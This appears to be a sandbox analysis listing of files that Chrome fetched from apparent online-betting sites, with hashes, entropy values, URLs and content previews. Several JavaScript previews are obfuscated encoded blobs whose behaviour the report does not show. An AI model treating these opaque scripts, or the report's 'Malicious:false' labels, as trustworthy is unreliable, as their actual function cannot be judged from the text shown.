                                                                                                                                                          SSDEEP:24:V/IuRx4iKI/YOkStcE47QfKFAvgEf+qjijnrmhcRch2nRs:V/Rx4pI/zkSt0kS4glqjMnrmwchJ
                                                                                                                                                          MD5:71F1D2A1B8A7E16EA382FA2A18961662
                                                                                                                                                          SHA1:90A19705EE1B2854B4C2901A3103B0961966A0B9
                                                                                                                                                          SHA-256:F7205AEC396A6156872A52FF89822817285224424505F1A7A9251243CC91C827
                                                                                                                                                          SHA-512:E61F2B64E12262AC2135E863C20783216407440014DE8EBB2204E9F5CB75883E6A03D9620D18A9C15F6C1037698273A0D6D1E6EC0CF341CF112CD363B967D305
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/alertBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALAZnwF0AaAbwCIBGAJwFUBpCgLgDMBXNGAFwEt1MUEkhLcAlJXZIQAAiTcavHhQDcAeTAArEDwB0AExCteaEAAUaKCCBrcAnphEUA+s5BIAsin3sANiApyADcoX3YQZgBCAAYAXzEVEJoZEABebkwKABF9AA5gCjESNHTdNEwQIt50zIA5AE0ADzVCkhga7PYAegAmVpRUzHKxTDJYkg1tHkxeXQBbKAgPdm4oPnQkEbIYXxRpDyQAc2YYXQAJePJ9FHr3Nk4efmGybgALXiR5o7MoGig53RIV4oYCpSJUUTvT5zb6/f66GChXxgWBwABkaLeHy+hx+fwBiN8yNRmDEsUuw1G40mOgyswWEAA4iBuNwbJscBQYbi4XMKEQxEUyPo1lB7lx1s8aCz2DQ0GQPgAhXxQNBwKJUckkYBrGCvZiUbl4+FAkEsDgSp6CCRJOTpKEqKAY6TcAAqvDmIBQK0wFseAgkABJMgBiaCHEAeKBIOCFXQRjLRMQAfk+SpVarB0WYaaQytVcDBmpIPSoSa1nre3iQzEpYwmWlpM3mi2Wq0lHO2u32RxO50uwpudz9ktJLyhOONANNoPBkOxRt5CKRKPgGKx0Nh+OXRNXcFJ5KKMBQcwgKxA+lrpKpDamdJbTJZbJoHOwXK3/35gra0rWF/F/rPIeJA0KkZDSmghg0ABo42r8MhQPaHzCKkUC6IGMC/myACi/iemg3CiKhujONIvisCRMAAD5UUgKjStwspoDIGQUAoqpILwkqBGQawKDWZBoP8EQUKwUCGIEczeCJ3rcAAtCYFBatgaGLtuM7Jqx+i8EEPF8S+Bq8JeFChDY3CKigjRKeM2BaTpPHyGsSgAMIqkgNZctGsZtG5AlgBm6poemBbAWhzhBJkMitHZunkI5fAwK50YeaZthyQsik2TFDnti5vnMBQrwgOJNhKSQtmZEg0BoIEKkkRFF
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1128
                                                                                                                                                          Entropy (8bit):5.481804985828627
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:YvZLFLJxw8R5RWorwilchF7i+3XRH9oH5LxOCE+MIR4QRBRKrfjj:Yv1FLJxwewo9E0ZLxh141z
                                                                                                                                                          MD5:D09B10A7A007BF78EEEB09FA29C8C1AB
                                                                                                                                                          SHA1:0B61E0D1118C5E403CFABEE428A75568CA2E79CC
                                                                                                                                                          SHA-256:ED157AC83CCFD16499961A0B7046F00086E7CDE60E16AA8190220A29A25AAA96
                                                                                                                                                          SHA-512:2259613EDB7C6A3A0C3F22FDAA595C08E25DA559EF73B7A27DE35683493F26791890852703A46946ED12DB80E0FD0307AA15378D41F0B354F8E177577F2538E4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{"analyticsCode":" (function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', '2bacc0c831e1b000832b0c92c2a0f627');","domainType":1,"snType":1,"agentCode":"","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"uy09","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{},"httpsEnabled":0,"loginBg":"","webPath":"t3685","httpsSupport":0,"analyticsJs":null,"loginLogo":"","name":".....","onlineCustomerServiceUrl":"https://yh1.ywkf89.cc/chatlink.html","preventPageFlag":1,"currencyCode":"CNY","icon":"/fileupload/uy09/202108/202108190259527.png","snStatus":1,"webTitle":".......","isMaintain"
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1200 x 1030, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):663866
                                                                                                                                                          Entropy (8bit):7.990888498948623
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:12288:D3hdblOdJfMslya9n61lNsCOFv2RQJzBTjP5sjPpDc8MmP7AdV:Dx6/fXAY61LsbFv+WBn5sjPpDRyV
                                                                                                                                                          MD5:5078398AAF522FD02D8EAFC917E5B298
                                                                                                                                                          SHA1:0DF3D76BF1EBAE5AB15E41F3657B113824B59815
                                                                                                                                                          SHA-256:3DD39AA5D4C3DBC88223F8ABC9A083F774A2966606F4EB6D5D5F189F9541041D
                                                                                                                                                          SHA-512:5C65FA8108656C5290A238CCC5A78D4EB8755F4502C4DBA24D1BD9EFAC71B98CA5C99510720366CB3CAEA88672F8EFEABF5C1C4F703AE508D77CB7521ABC7C05
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/367/mask_sport.png
                                                                                                                                                          Preview:.PNG........IHDR.............'.C.....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:2a20a322-abb0-7d4b-a314-8499dce09f12" xmpMM:DocumentID="xmp.did:10337EB2A1EC11ED9CCBFD27EAD60A42" xmpMM:InstanceID="xmp.iid:10337EB1A1EC11ED9CCBFD27EAD60A42" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5f260e3d-5a7a-994a-a15c-6f0e538cf2ff" stRef:documentID="adobe:docid:photoshop:57c92997-44a1-d946-80ab-fc529bdf8d45"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>. ;....IIDATx..k.-
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2442
                                                                                                                                                          Entropy (8bit):7.469194340286183
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:euinNuij6eJ3jt7IhrMCsm1cn40wt2GnLh73RiJtqxsTeOzo:2NIG7Ihr31oDwnLRQqxOzo
                                                                                                                                                          MD5:ED097FE6098C539EC482E67E5ACBF451
                                                                                                                                                          SHA1:7BC83D0908219E78AE0FF4811FA5D6935D24184B
                                                                                                                                                          SHA-256:FAA10874B0AF9B5A478AE1775B6B1F0ECA93B76FFB681AF56E98F651D751E803
                                                                                                                                                          SHA-512:588A81A0DAE5BAE607A7EF8B401C60592A516FD65440B2D32BA92244BB84B199528D178F1BA8139B29B9A3BF76434DEBC2CFDCC1A010C9603641AD0818E601C6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_bg.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:0F9F88E1F77811E7BC26CA443FF92646" xmpMM:InstanceID="xmp.iid:0F9F88E0F77811E7BC26CA443FF92646" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a581549a-d504-de42-880f-f1f6b1e4689b" stRef:documentID="adobe:docid:photoshop:fe692dff-f776-11e7-8e5d-cdd6397f58a0"/> </rdf:Description
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):646808
                                                                                                                                                          Entropy (8bit):5.999963003531135
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:Db1crXeslQWPWhE4a12304XP3Vzu49eJp2qy6oSQ5rI7MuNf+MjEK:3IXu4Why1JQP3VzocqynSQ507MyJb
                                                                                                                                                          MD5:FE026EAF43E3A05F6D89F9E0E2845686
                                                                                                                                                          SHA1:7AD3FD8DB8D2E492D0E453A0A79C4E4BB0F5900C
                                                                                                                                                          SHA-256:9790B83F737EA9E9CB3A34597E880FC36F68DA163E19018C539C148AB7BEEC8E
                                                                                                                                                          SHA-512:BDE96390134C2E1BF3F0C7651BB9F64937CEEB41FBD0DF01F6473EDD0A5A1FB0B33ADE1F895C3F3487056E8E72CEAE4B37E7EACCC7ECB4D673366B58C061D9F9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/fiximg/ac-20200404/fileupload/ll12/202308/202308232156575.jpg
                                                                                                                                                          Preview:4Mye78yQQodBYchoXbg6Qz+nnJTv8wegMT6Z7MFgDdMxmBMg7mGXEPAbL+7zWzx9zx3Nlr1c/yflSsR2aWl2kPa+QtC3vp0En9wVdd5e0T/szO4Ud7k7X0Pws/eC0g0wAdyeXQSbmyppex2DyFwIWisp1/MRfRjxqyVidNEAGtyLyhijdhGWUvaaIc675omkdUSswcPGhiJZRfstAE5JgsZMQTP7vbqLexBpOrxHq2RUYKFUwlgCu/edSdcbPGUnvYFJWuJe2uUplI9pWsq7oXP6SdGRwpbXo1EoRJNbKaxidEjuxCsuJPzXhmbTjPYa7N0nJkd3R2KLI5SJYvtyAbQwltXye6fanRGYpCA7B5TJOIl+ZBu5eBXq3amw4t51EWJ9FWOH54WtyIk4m7Nlyj1+g8yoeTkxyUY/Tpf8TbT4qbgB3/fr2FbKfxtY44GJT/nk8z2s5FEVsn8mgjWgnH3tqeOFZET70VM+wChTa4N6HxMaeBw+Z6m/5yMtfow61cwjAxh80RNn0R+1qm2WnTd09uyVO3BrRNsysB8/BAnTKUDHEYe43cOBD0NZ5uSUaZTc/t8UbFn3xsOKugrDbDJwxRo1T4X0cxlD+GRw9vZcA6XjvnE07Ma0BkvTGyIF2fI/noSrFFiAxB1pdJE/kCx/gEG66zHAlzwTFTHD5gp/Z/oF8cQF/33wVWvppiaJhbDbq9JQUvqRhpdsyY2Z0tX1FG30S3OeFeZQI8hftxrcB8DwobN8j+ptFSDuVvoJLIK/uRKH0WpsD/fja4iXvYGTtedcTvMmE0Owoq4WH72oKN50JTc0Sd4NUFwhF/hHhFkId4Gfd6+p4K8RX/kGa2k86tBpV66a/iLjMxDzGK+UnsQzyfNtzuXD4Y/6i7f8/2NbEq6iRYAczH2+D0kv+6RRnJdS+g7kkbCUCWfyp4GJqICz4KWpdHgvkx8a/HSVKF9OHAYJ2U+h0fnvwRjaQZb1shaX+MB6JvIt2xG3
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 168x168, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6871
                                                                                                                                                          Entropy (8bit):7.872376472792791
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:p7FikLUR+6X7MCy5nSb1jSG99DX8yclWGo2yscY8:pfA3+gSGjX25+Y8
                                                                                                                                                          MD5:99BE4BFE275809D4E436B77C991B1381
                                                                                                                                                          SHA1:54EADEE77394EB62CCF377AE68D9F49ACB5B6785
                                                                                                                                                          SHA-256:4CA35131972ACDF420B94F0D64A5A0F504EB5A7B0E6FB7B8B467916A12AAE37D
                                                                                                                                                          SHA-512:452A79B02619ED5C1E4F81FC5A4A209CB8A11D03AADB1841AE9BE18FBCA088652CDB54340329C1BF57771ABFB02FFED4BF75B61F4DF96866B7F2358C36AE75A3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/commonPage/zh_CN/mobileTopic/images/special_3.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......<...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmpMM:InstanceID="xmp.iid:D4BE92C0D83711E8AF8CAD9701B14EA4" xmpMM:DocumentID="xmp.did:D4BE92C1D83711E8AF8CAD9701B14EA4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D4BE92BED83711E8AF8CAD9701B14EA4" stRef:documentID="xmp.did:D4BE92BFD83711E8AF8CAD9701B14EA4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 28 x 25, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1591
                                                                                                                                                          Entropy (8bit):7.158858778547658
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:uv1hfvWwjx82lY2T3JVrG76hyJ3VrZTTGWtvUo3JW8NeAjMg+GA6nDr0R/AEJdnb:u9ANn2N8J3bR9ReAb+LUDrSAGqU
                                                                                                                                                          MD5:279C9093E7A9BC8E2159000014400234
                                                                                                                                                          SHA1:D9D353B9B25F709E48DAD2265806B4F022D6602F
                                                                                                                                                          SHA-256:9FED9AE7A0C5F3F890A8BD19E23721345C48B14C43B7D7BD453A3CB40344BA3E
                                                                                                                                                          SHA-512:0D45D5876C255FA3B717D28880CBDC77F43797FBC6B7B8D001B96FE409445E6A5A1E16E19E9F3F3E8B4E75FC0B46955452A39CE4D60BA4A34A289D18E35BD1C8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............".N'....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:84D932BE504B11E78BFE9E8B143BFF96" xmpMM:DocumentID="xmp.did:84D932BF504B11E78BFE9E8B143BFF96"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:84D932BC504B11E78BFE9E8B143BFF96" stRef:documentID="xmp.did:84D932BD504B11E78BFE9E8B143BFF96"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>........IDATx..Mh.A..7...b.x..!.....b#~ ..-.`.E..xV."^D.....?...(..*..*Z..(........h.....0.n.3.....y.y/of6...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (9788), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):9788
                                                                                                                                                          Entropy (8bit):5.925730534881683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:V0A0z9birY7j8oZWk48Fm9UTU0RXX45P/41cnh8ujA/+N2sq/coxT69IR8b4uy:V0A2bQY7j8op0UTU0RX6/4+nu0bq/cor
                                                                                                                                                          MD5:571C13785DCF8153E43EA8A1914A5A60
                                                                                                                                                          SHA1:97CA14E0781A30F12F42AEF77F339F6C6FEB643D
                                                                                                                                                          SHA-256:24A094040278302FBA554B175BA5E92CEDEA1897CF6DA633A86A7EFB6A618601
                                                                                                                                                          SHA-512:97353439E5ABE6E1377C487DC6DD19A5A26F81B9D34E86315784C24E9D1AFBCF1E4DFB21E54079360263303030043564BF15E3E75E4D548E0F09587C0155B471
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/prizeWheel2.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgFYAOAXQBoBvAIigGEB6AFmoC4AzAVzRgBcBLdJhDle5fgEoanJCAAESXgCd+fagG4A8mABWIPgDoAJiHb80IAApKUEEEt4BPTGOoB9NyCQBZFEc4ANiDUVABuUAGcIKwAhAAMAL4S6uFKcmgAvPyY1AwMAGJw1BLkSFkGaJhoJUpZOQAiRsTAxeRQ5ZVKJSh11HEwEOytML0AcgCaAB6arQEZmNnUlggAFoStUJgSmJQJ5Np6fJgwBgC2UBAA4iC8vPZI29jU/EgAMigA5uYh1EhoAMo3ARoD4/CAqABeIAA6isQCAAtYUKcXsFyL8VihgLD4QFqKQSpQbLwoHd/iS7hxuHxBJUpEobpwlGhKNDwHB+LwACpKKBoJDsFBKU6sajE0kgHIAal4KxeBnFd3qIA+UuoJg+EhCbLAHO5vP5nNpooAtKBdZyTco+QKhac5IQkHIQFBZCaUJxeNQEntFSByRKAExUngCIT0xnMuSy+VBNAAflZ7M5PJtguFout/ICEoAGpgTYQ4gBSCRyP3SgsATjiVrlSAMKwi7AAgkoYBI1RqtQlWIlyLYw/yQzTw5R+OxMDEYw3zIKJAzeEy0NhSCkoGkQBkZwY5ygDOD+FC6OgzB91Ivl874wh/ppRgeN7JhBJWKu9nGR0OtkTI2ho/WBiDrSDZxh8sp7BuMBGF+tI/peUa4MQcQAFQ7lBDDeKSKwGJYACSkHtrBY4If+O5xvGgYoVhsq4XhDDkSAaB9nsTYBK2RFcKGcERkuUaMQm+AAGxxAwmBUQJr79gIpwgCeaBnsRdK/nxZGAXuABkGk7nuBgyXJp78B8N53g+0BKM+OkKfu+nyWer7vuIMDoJcKC4Ep8F/tQTIBNKwDmEYWIGHQ9SjG4lgtlyAASaoMPw5wfCAJoQDADDOacpzoAwh5QsAcIIgwHwoG4cS4AeII9k5LkoMGXGjsppH
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1860), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1860
                                                                                                                                                          Entropy (8bit):5.845944771947073
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VHQC6JX8y7EBsWWg0fflUGOW69XM3X89UBGPhZC75wCP3g2xHuf6bsWalp:Vw517EBpWgWfKzt1+BAhZC75wXSbsdlp
                                                                                                                                                          MD5:DFD335562D8D028292B8569586AB6902
                                                                                                                                                          SHA1:68EDA38D42D0F4BC5C60AF2C58CC33CD17280B6C
                                                                                                                                                          SHA-256:E95BAB46761928950BD59EBD8FE1C6A3D1FFDE89D2A6D79C730D0C74C5785646
                                                                                                                                                          SHA-512:47C2F125E8C97CE93DE0192641732D38B635B0F36FF2DDFF864DCCF2682FF5DAB27ECF1F7C9944DBA3736C45780A170D6B84ADAFE5953E82CEDB1DDE54BE5BB9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/wrapper.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgE4BdAGgG8ARSgJQEUAuAMwFc0YAXAS3UzVJCkOASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EVEPlpLgBeDkwxSn0ADmAxYVJ5dN00TC5ClnTM6JgIJgLSX2qxADkATQAPNUaUVMx5TGFMcljSDW1OTF9dAFsoCABxEA4OGyRh7DEuJABlGyClEEoQNC4QfTFiYULyGBRZiHRTjiQGcjB0SWY2Th4y0TyFYseRoaQcXQgTAARgAzPhcMJdBwABanTAQsAmfR8Py+UhieQAc0IdgKwjGvigdhsP3Y3F4gOBoPBkJhsIALABWJGo9GY7G43z4sQAYQAjgA2ACi5LGsyQRIAQihOnS/ozyECOCCwRCoTlOby0WUBWgcWg8QSOQBqShkm5jUI2DgqtWsen/IZa5l6tkc2Gw4383RY81CkXQ+QAVQA0nLSPc0EF1v83eqGQCfTqWfrMIacsHTaHBZbhQTOgBJaG+BNQNChOxIHYZr1MnN+qFcuFFjEl8NlkVK1qUDkJjgoKByVua7W61kG+G9s0Wq1iACC0eilAThjOFxnWbnubZcKIy/7q/LYjMvkINATvi4KZy0Wih+9x877Ml+AvYavEVxX0aVFkfZ8QFfWo3g9DUj19Bd2QDf9SzXAANXAADUoATVA2H0D923nPM4UlHlkRNPsAIjAlxVaVpOgTCBFAALxAAB1NEQF8Qjs2I09YS5QsKJDajBwJKBRQAejHR1SFMUUFg4GAUSgXiv0Qs8gxE4sxLXIkmDMXYmJRZ4lWxEwiTMKwWAgdSEJI2FJWiFCBzXOgwENR8UCJEwlTsLwsX8eyO00zk/x0qjUOvFiABU6AALVwp5bCVFYQv4qEz3IvldOikVcBoBLazkrhHhQWwzCnJBgAqgjYMzT8
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 63 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4156
                                                                                                                                                          Entropy (8bit):7.839388968091748
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:D2ssJHZyRx9BkjHoYHLzdjMhT90bs91O7DhpW:85yGjH1dghTmbwO79pW
                                                                                                                                                          MD5:572961504453B8307F8AFD74382C4464
                                                                                                                                                          SHA1:CB9DAD597AE7D8921FD09C347107C623281819B7
                                                                                                                                                          SHA-256:57C0A73478E7C82039B8F451A1E216991166B7BFBE3957C2684B0FE5069BF041
                                                                                                                                                          SHA-512:9E39E0DE08D2FA06FAA4BF103FD8B6D68C27F4D7A13EAF5A175D73A80334813B9AFB506BA6C85C2A3F8E56D42639DBDB92F77A269E4BD96D4FCCFA07DEA06AAD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...?...%.......1"....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:19E100BC7B7B11E884ADEE14D294A800" xmpMM:DocumentID="xmp.did:19E100BD7B7B11E884ADEE14D294A800"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:19E100BA7B7B11E884ADEE14D294A800" stRef:documentID="xmp.did:19E100BB7B7B11E884ADEE14D294A800"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..(....IDATx..Yip[..=o.,..&.N.;....I..4)%....R(..e.......:.C..N..(.2.f`JJ..J.8.....$$.c...Y.d.O..{O.dY.. ..|c[
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (7496), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7496
                                                                                                                                                          Entropy (8bit):5.806289145918301
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VaY3qU3TWLF6D8pkM2mjVjxDIpnrm3ce5AgtDWyMAVBNhR:VaY3fTWLK8/9B6lrUVWhUj
                                                                                                                                                          MD5:425C64B616198C0E379513632E3F18E1
                                                                                                                                                          SHA1:155389C2C1EF60CABD3BD04E3F14326A1092E146
                                                                                                                                                          SHA-256:55FB63220A03183D369BC9CB06727E2DBF9BA45303EE735E1F7426FA45BC929F
                                                                                                                                                          SHA-512:05FCAC28259C5D69B75767D4661BC2FA45ECB65522FDA29804182A4E2BD31A65F1277B7524A63F5D5A647917001AD3AA98C00C6A4688B587CB93C3C3586EFC07
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/t4043-index-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAdgF0AaAb2AGUAGAKwC4AzAVzRgBcBLdTEYqYtgEpSAIiZIQAAiRsATh3YiA3AHkwNEOwB0AExAMOaEAAVZKCCFlsAnpn4iA+g5BIAsih1MANiBFkAblBeTCB0AIRUAL6CArp2xCIAFiBQerJ+zKyc3MKyIGxMsmiSaNGxOvEiXigA5oYU+Rks7FxomLn5hcUcZWxx9gC2IGhMTVmt7aR5BUWSAF69/QkMKChslmMtOVOdswOLFfaGSBx6m9ltHTPFMAeVx6cgAEJQaEbpxJlblzvXkl53ewyaw+c4TK5dSQoQEJQx6AAeADFVusPl8LpNppCdDCRHCQPCAGocEDAMHbLGzWS4gzwkA6YwoGTkn6U4oOXEDFBgDg+ABypKQiRQZM+zQxENmSE53N5vjF4wpu2KEGiSkCshKAF5SNUaig6KRgT5DZFIgIOBAkAAZDgyOjYUg2Cx0EScIZ+BToV2ACjlPTB0DAvFA5nNXV60A53b5zU7rC6qoY4P7vSI/cQvHa2ABJdYDB1OglsADCAAlXYBwTUAFK6ARX9AALqfiDIbDIj8iTyDFdiTYbCtdAA9P2vF4AIwAJnwAFYAGxULRQCw9lIDLQBgZ+NhQWQ1fKuhwSLwMESx9bwkvlkSABtNANJGgE1TQDQXo3g6HXQAlFQAVQAKgBRV8OL9vxUV9swAQWtFNWGfFsIwcEdjzIU9z1dAARPkKEAO/lAFhNB8n2bN9P1/f8fwADWMa1QOzPlIKbF88QDSMxwQwszzLV1AAx5QADg0AbltAAqlQByTUAUOU8LotsOy7Hs+0HcdcAIEdrESVcUAGfsNy3Hc2D3MBgzQZNIkIE941CRNdMg30/EzGRcxAfNHSQtiREACBVAFIQwBjuUAMBcRJbd9vz/BxjFA18vz5P8KGY+yL2vQAuc1A4xjC8gjfP/VwVCebNrR/Y8DIM4gOB1ORXhWWQB
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (29804), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):29804
                                                                                                                                                          Entropy (8bit):5.998824134543712
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:9rOkvGmRxvXACHcXF01/edkhJ4JWX2q2pnuNaJHf:95DRxvfgO/hJ4JWGZpnQaJHf
                                                                                                                                                          MD5:13334ED6E02963EA6A779F38ADB4E8D8
